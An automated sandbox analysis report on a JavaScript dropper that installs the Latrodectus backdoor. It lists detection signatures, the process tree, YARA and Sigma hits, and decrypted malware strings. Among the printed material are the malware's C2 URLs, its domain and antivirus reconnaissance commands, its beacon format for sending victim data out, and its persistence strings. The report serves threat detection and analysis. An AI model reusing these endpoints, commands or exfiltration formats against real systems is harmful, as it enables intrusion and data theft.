Edit tour

Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Sample name:	Document_a19_79b555791-28h97348k5477-3219g9.js
Analysis ID:	1431885
MD5:	3f4ddf670c98e5b0656415286e42f730
SHA1:	cf27b8f44467cd4ab250b74caa039340ecd97a94
SHA256:	156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
Tags:	js
Infos:

Detection

Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

JScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Yara detected Latrodectus

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sleep reduction / modifications

Drops executables to the windows directory (C:\Windows) and starts them

JavaScript file contains Antivirus product strings

PE file contains section with special chars

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample has a suspicious name (potential lure to open the executable)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Uses ipconfig to lookup or modify the Windows network settings

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5272 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

msiexec.exe (PID: 6468 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 3380 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1 MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSI3B6A.tmp (PID: 2748 cmdline: "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: B9545ED17695A32FACE8C3408A6A3553)

rundll32.exe (PID: 5988 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 2700 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 4012 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)

cmd.exe (PID: 5460 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 356 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)

cmd.exe (PID: 3816 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 6704 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

WmiPrvSE.exe (PID: 3620 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 5860 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 768 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 6472 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

nltest.exe (PID: 5476 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)

cmd.exe (PID: 2132 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6460 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

rundll32.exe (PID: 2696 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 6764 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39 https://twitter.com/Myrtus0x0/status/1732997981866209550 https://www.embeeresearch.io/latrodectus-script-deobfuscation/	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Process Memory Space: rundll32.exe PID: 4012	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
decrypted.memstr	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.187ec850000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
11.2.rundll32.exe.1ffb4f00000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
11.2.rundll32.exe.1ffb4ef0000.0.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
6.2.rundll32.exe.187ec840000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.201da900000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
8.2.rundll32.exe.1a379500000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.201da900000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.201daae0000.2.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
8.2.rundll32.exe.1a3794f0000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
11.2.rundll32.exe.1ffb4ef0000.0.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
8.2.rundll32.exe.1a379500000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
6.2.rundll32.exe.187ec840000.1.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
6.2.rundll32.exe.187ec850000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
8.2.rundll32.exe.1a3794f0000.0.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
7.2.rundll32.exe.201daae0000.2.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
11.2.rundll32.exe.1ffb4f00000.1.raw.unpack	JoeSecurity_Latrodectus	Yara detected Latrodectus	Joe Security
Click to see the 11 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", ProcessId: 5272, ProcessName: wscript.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 45.95.11.217, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\msiexec.exe, Initiated: true, ProcessId: 6468, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js", ProcessId: 5272, ProcessName: wscript.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2132, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6460, ProcessName: net.exe

Sigma detected: Share And Session Enumeration Using Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2132, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6460, ProcessName: net.exe

Sigma detected: Suspicious Network Command

Source: Process started

Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 4012, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 5460, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 6.2.rundll32.exe.187ec850000.2.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Sample uses string decryption to hide its real strings

Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c ipconfig /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c systeminfo
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &ipconfig=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net config workstation
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c whoami /groups
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &systeminfo=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all_domain=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &wmic=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_config_ws=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_wmic_av=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &whoami_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &proclist=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &desklinks=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Update_%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Custom_update
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Updater
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: rundll32.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s", %s %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: runnung
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :wtfbbq
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: files/bp.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %d.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: init -zzzz="%s\%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: front
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /files/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Facial
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: !"$%&()*wp
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: POST
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: GET
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: curl/7.88.1
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: CLEARURL
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: COMMAND
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ERROR
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <html>
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <!DOCTYPE
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: 12345
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &stiller=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: LogonTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %x%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: TimeTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0H%02dM
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &mac=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :%02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0S
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &computername=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \*.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \Registry\Machine\
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://jarinamaers.shop/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://wrankaget.site/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Desktop
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Startup
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Personal
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Local AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \update_data.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS\|%d\|%s

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

6_2_000000018003BC0C

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
